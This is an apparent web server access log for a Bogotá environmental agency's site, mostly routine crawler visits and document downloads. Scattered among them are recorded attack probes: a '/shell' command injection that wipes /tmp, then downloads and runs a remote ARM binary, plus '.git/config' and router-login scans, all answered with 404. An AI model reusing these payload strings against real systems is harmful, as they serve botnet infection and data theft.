40.77.167.146 - - [14/May/2023:12:22:49 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [14/May/2023:12:22:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:22:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.191.232.4 - - [14/May/2023:12:24:39 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 200 1013088
45.191.232.4 - - [14/May/2023:12:24:39 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 206 30048
201.245.192.253 - - [14/May/2023:12:25:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:12:23:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:12:27:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:12:29:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37598
201.245.192.253 - - [14/May/2023:12:29:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43670
45.191.232.4 - - [14/May/2023:12:30:03 -0500] "GET /BLA/resoluciones/Decretos/DECRETO%201468%20DEL%2006%20DE%20AGOSTO%20DE%202018.pdf HTTP/1.1" 200 3831327
45.191.232.4 - - [14/May/2023:12:30:04 -0500] "GET /BLA/resoluciones/Decretos/DECRETO%201468%20DEL%2006%20DE%20AGOSTO%20DE%202018.pdf HTTP/1.1" 206 65536
45.191.232.4 - - [14/May/2023:12:30:05 -0500] "GET /BLA/resoluciones/Decretos/DECRETO%201468%20DEL%2006%20DE%20AGOSTO%20DE%202018.pdf HTTP/1.1" 206 65536
45.191.232.4 - - [14/May/2023:12:30:06 -0500] "GET /BLA/resoluciones/Decretos/DECRETO%201468%20DEL%2006%20DE%20AGOSTO%20DE%202018.pdf HTTP/1.1" 206 65536
201.245.192.253 - - [14/May/2023:12:30:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
66.220.149.23 - - [14/May/2023:12:30:23 -0500] "GET /con-actividade HTTP/1.1" 404 1034
66.220.149.120 - - [14/May/2023:12:30:23 -0500] "GET /con-actividade HTTP/1.1" 404 1034
66.220.149.120 - - [14/May/2023:12:30:24 -0500] "GET /con-actividade HTTP/1.1" 404 1034
66.220.149.23 - - [14/May/2023:12:30:24 -0500] "GET /con-actividade HTTP/1.1" 404 1034
172.22.2.4 - - [14/May/2023:12:28:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:29:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
95.164.44.19 - - [14/May/2023:12:32:13 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
216.245.221.92 - - [14/May/2023:12:32:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.92.38 - - [14/May/2023:12:33:24 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [14/May/2023:12:35:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:12:34:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:35:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:12:37:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:12:39:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37598
201.245.192.253 - - [14/May/2023:12:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43670
201.245.192.253 - - [14/May/2023:12:40:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:12:40:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:12:42:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:41:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [14/May/2023:12:45:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:12:47:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:46:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:47:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53114
40.77.167.97 - - [14/May/2023:12:49:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/4149.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/May/2023:12:50:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
207.46.13.211 - - [14/May/2023:12:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202023/0261.pdf HTTP/1.1" 304 -
66.249.77.23 - - [14/May/2023:12:51:16 -0500] "-" 408 -
40.77.167.146 - - [14/May/2023:12:51:31 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
216.245.221.92 - - [14/May/2023:12:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:12:52:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.16.157.180 - - [14/May/2023:12:53:55 -0500] "GET /secretaria-de- HTTP/1.1" 404 1034
199.16.157.183 - - [14/May/2023:12:53:56 -0500] "GET /secretaria-de HTTP/1.1" 404 1034
199.16.157.183 - - [14/May/2023:12:53:59 -0500] "GET /secretaria-de HTTP/1.1" 404 1034
172.22.2.4 - - [14/May/2023:12:52:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
199.16.157.183 - - [14/May/2023:12:54:03 -0500] "GET /secretaria-de HTTP/1.1" 404 1034
199.16.157.183 - - [14/May/2023:12:54:10 -0500] "GET /secretaria-de HTTP/1.1" 404 1034
172.22.2.4 - - [14/May/2023:12:53:26 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/May/2023:12:52:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49141
201.245.192.253 - - [14/May/2023:12:55:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:12:53:42 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 55571
172.22.2.4 - - [14/May/2023:12:55:26 -0500] "GET /BLA/boletinlegal/WuEL HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:12:55:33 -0500] "GET /BLA/boletinlegal/a HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:12:55:37 -0500] "GET /BLA/boletinlegal/download/file.ext HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:12:55:40 -0500] "GET /BLA/boletinlegal/SiteLoader HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:12:55:49 -0500] "GET /BLA/boletinlegal/mPlayer HTTP/1.1" 404 1018
199.16.157.169 - - [14/May/2023:12:56:38 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
177.240.129.6 - - [14/May/2023:12:56:57 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
186.85.156.77 - - [14/May/2023:12:57:15 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
168.119.76.212 - - [14/May/2023:12:57:49 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
216.245.221.92 - - [14/May/2023:12:57:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.77.21 - - [14/May/2023:12:58:37 -0500] "-" 408 -
51.159.195.16 - - [14/May/2023:12:58:50 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
51.159.195.16 - - [14/May/2023:12:58:51 -0500] "GET /images/rehabilitacion-de-un-tayra-en-bogota.jpg HTTP/1.1" 200 41000
172.22.2.4 - - [14/May/2023:12:57:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:13:00:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:12:58:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
186.170.211.192 - - [14/May/2023:13:00:59 -0500] "GET /php/PlanDesarrollo/MANUAL%20SEGUIMIENTO%20PLAN%20DE%20ACCION%20NOVIEMBRE%202009.pdf HTTP/1.1" 404 1272
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.170.211.192 - - [14/May/2023:13:02:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.170.211.192 - - [14/May/2023:13:02:27 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.170.211.192 - - [14/May/2023:13:02:27 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.170.211.192 - - [14/May/2023:13:02:27 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
69.203.194.35 - - [14/May/2023:13:02:40 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
216.245.221.92 - - [14/May/2023:13:02:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:13:05:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:03:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:04:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
207.46.13.211 - - [14/May/2023:13:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/5770.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/May/2023:13:07:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:13:10:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:09:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.86.33.132 - - [14/May/2023:13:11:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.86.33.132 - - [14/May/2023:13:11:21 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.86.33.132 - - [14/May/2023:13:11:21 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [14/May/2023:13:10:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:13:12:51 -0500] "HEAD / HTTP/1.1" 200 -
109.205.213.39 - - [14/May/2023:13:14:02 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm;chmod+777+/tmp/UnHAnaAW.arm;sh+/tmp/UnHAnaAW.arm HTTP/1.1" 404 1013
92.118.39.109 - - [14/May/2023:13:14:36 -0500] "GET /.git/config HTTP/1.1" 404 1018
201.245.192.253 - - [14/May/2023:13:15:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
45.191.232.4 - - [14/May/2023:13:15:22 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
173.252.95.7 - - [14/May/2023:13:15:59 -0500] "GET /animales-recuperados-en-san-cristobal-y-ciudad-bolivar-son-atendidos-en-el-centro-de-flora-de-la-secretaria-de-ambiente.html HTTP/1.1" 206 1056
172.22.2.4 - - [14/May/2023:13:15:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:13:17:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:16:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
45.191.232.4 - - [14/May/2023:13:18:37 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 200 1013088
45.191.232.4 - - [14/May/2023:13:18:38 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 206 30048
201.245.192.253 - - [14/May/2023:13:19:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39795
201.245.192.253 - - [14/May/2023:13:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43498
201.245.192.253 - - [14/May/2023:13:20:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.146 - - [14/May/2023:13:20:14 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
92.118.39.108 - - [14/May/2023:13:21:11 -0500] "GET /.git/config HTTP/1.1" 404 1018
216.245.221.92 - - [14/May/2023:13:22:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:21:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:22:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58663
201.245.192.253 - - [14/May/2023:13:25:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:25:08 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%201%20del%2010%20de%20Abril%20de%202014.pdf HTTP/1.1" 200 258865
186.155.42.105 - - [14/May/2023:13:27:24 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
216.245.221.92 - - [14/May/2023:13:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:27:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:13:29:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39795
201.245.192.253 - - [14/May/2023:13:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43498
172.22.2.4 - - [14/May/2023:13:27:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [14/May/2023:13:29:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:13:32:51 -0500] "HEAD / HTTP/1.1" 200 -
173.252.95.116 - - [14/May/2023:13:34:10 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
173.252.79.13 - - [14/May/2023:13:34:10 -0500] "GET /images/jornadas-llantas-usadas-23-mayo.jpg HTTP/1.1" 200 148376
172.22.2.4 - - [14/May/2023:13:32:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:13:34:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:33:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
216.245.221.92 - - [14/May/2023:13:37:51 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:13:38:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/4180.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/May/2023:13:39:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39795
201.245.192.253 - - [14/May/2023:13:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43498
201.245.192.253 - - [14/May/2023:13:39:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:38:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:39:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [14/May/2023:13:39:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
172.22.2.4 - - [14/May/2023:13:42:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:13:42:22 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [14/May/2023:13:42:51 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.2 - - [14/May/2023:13:43:17 -0500] "GET /si-tienes-ropa-y-calzado-que-ya-no-usas-aca-te-presentamos-seis-puntos-a-donde-los-puedes-llevar.html HTTP/1.1" 206 872
69.63.184.7 - - [14/May/2023:13:43:17 -0500] "GET /images/prendas-1_optimized.jpeg HTTP/1.1" 200 65869
69.63.184.119 - - [14/May/2023:13:43:28 -0500] "GET /images/prendas-1_optimized.jpeg HTTP/1.1" 200 65869
172.22.2.4 - - [14/May/2023:13:43:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
201.245.192.253 - - [14/May/2023:13:44:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
167.94.145.59 - - [14/May/2023:13:45:27 -0500] "GET / HTTP/1.1" 200 319
167.94.145.59 - - [14/May/2023:13:45:27 -0500] "GET / HTTP/1.1" 200 319
167.94.145.59 - - [14/May/2023:13:45:28 -0500] "PRI * HTTP/2.0" 400 946
167.94.145.59 - - [14/May/2023:13:45:28 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [14/May/2023:13:44:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53114
66.249.77.25 - - [14/May/2023:13:46:17 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:13:44:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:45:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
216.245.221.92 - - [14/May/2023:13:47:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [14/May/2023:13:48:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0632.pdf HTTP/1.1" 304 -
40.77.167.146 - - [14/May/2023:13:48:47 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
173.252.83.18 - - [14/May/2023:13:48:48 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
172.22.2.4 - - [14/May/2023:13:47:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61759
201.245.192.253 - - [14/May/2023:13:49:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:13:50:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:52:12 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [14/May/2023:13:52:12 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:13:52:19 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=humedales&ano=&resuelve= HTTP/1.1" 200 10251
216.245.221.92 - - [14/May/2023:13:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:51:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
172.22.2.4 - - [14/May/2023:13:53:58 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/May/2023:13:54:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
66.102.8.213 - - [14/May/2023:13:56:45 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
207.46.13.211 - - [14/May/2023:13:57:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/2149.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/May/2023:13:57:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:56:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:13:57:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
34.78.6.216 - - [14/May/2023:13:59:10 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/May/2023:13:59:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:14:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:02:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
20.197.209.11 - - [14/May/2023:14:04:16 -0500] "GET /galeria/mapa/3MapaBogot%C3%A1.jpg HTTP/1.1" 200 688183
172.22.2.4 - - [14/May/2023:14:04:36 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [14/May/2023:14:04:37 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:14:02:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
172.22.2.4 - - [14/May/2023:14:04:43 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=&sector=humedales&ano=&resuelve= HTTP/1.1" 200 10251
172.22.2.4 - - [14/May/2023:14:04:43 -0500] "GET /BLA/boletinlegal/images/docs.png HTTP/1.1" 200 10288
201.245.192.253 - - [14/May/2023:14:04:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:14:07:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:07:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
173.252.95.9 - - [14/May/2023:14:08:19 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
40.77.167.146 - - [14/May/2023:14:08:47 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
172.104.11.51 - - [14/May/2023:14:08:48 -0500] "GET / HTTP/1.1" 200 319
173.252.95.117 - - [14/May/2023:14:09:33 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
172.22.2.4 - - [14/May/2023:14:07:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:14:09:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:14:10:08 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
172.22.2.4 - - [14/May/2023:14:08:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.146 - - [14/May/2023:14:11:38 -0500] "GET /Publicaciones/2023EE62669.pdf HTTP/1.1" 404 227
216.245.221.92 - - [14/May/2023:14:12:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:14:14:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:14:13:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.97 - - [14/May/2023:14:15:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/2127.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/May/2023:14:14:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
168.119.253.6 - - [14/May/2023:14:16:27 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/May/2023:14:17:49 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [14/May/2023:14:17:51 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:14:19:00 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [14/May/2023:14:19:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39823
201.245.192.253 - - [14/May/2023:14:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43817
201.245.192.253 - - [14/May/2023:14:19:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:14:19:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:20:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:14:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:14:24:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
173.252.87.2 - - [14/May/2023:14:26:48 -0500] "GET /con-actividades-de-educacion-ambiental-cuidado-y-embellecimiento-bogota-celebro-el-dia-mundial-de-la-tierra.html HTTP/1.1" 206 881
172.22.2.4 - - [14/May/2023:14:25:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:14:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:26:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
201.245.192.253 - - [14/May/2023:14:29:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39823
201.245.192.253 - - [14/May/2023:14:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43817
201.245.192.253 - - [14/May/2023:14:29:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:14:32:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:31:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:14:33:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1163&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1066
172.22.2.4 - - [14/May/2023:14:32:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
40.77.167.97 - - [14/May/2023:14:34:38 -0500] "GET /Publicaciones/2023EE72590.pdf HTTP/1.1" 404 227
201.245.192.253 - - [14/May/2023:14:34:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
168.119.76.212 - - [14/May/2023:14:37:14 -0500] "-" 408 -
216.245.221.92 - - [14/May/2023:14:37:51 -0500] "HEAD / HTTP/1.1" 200 -
162.55.37.179 - - [14/May/2023:14:37:54 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/May/2023:14:37:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
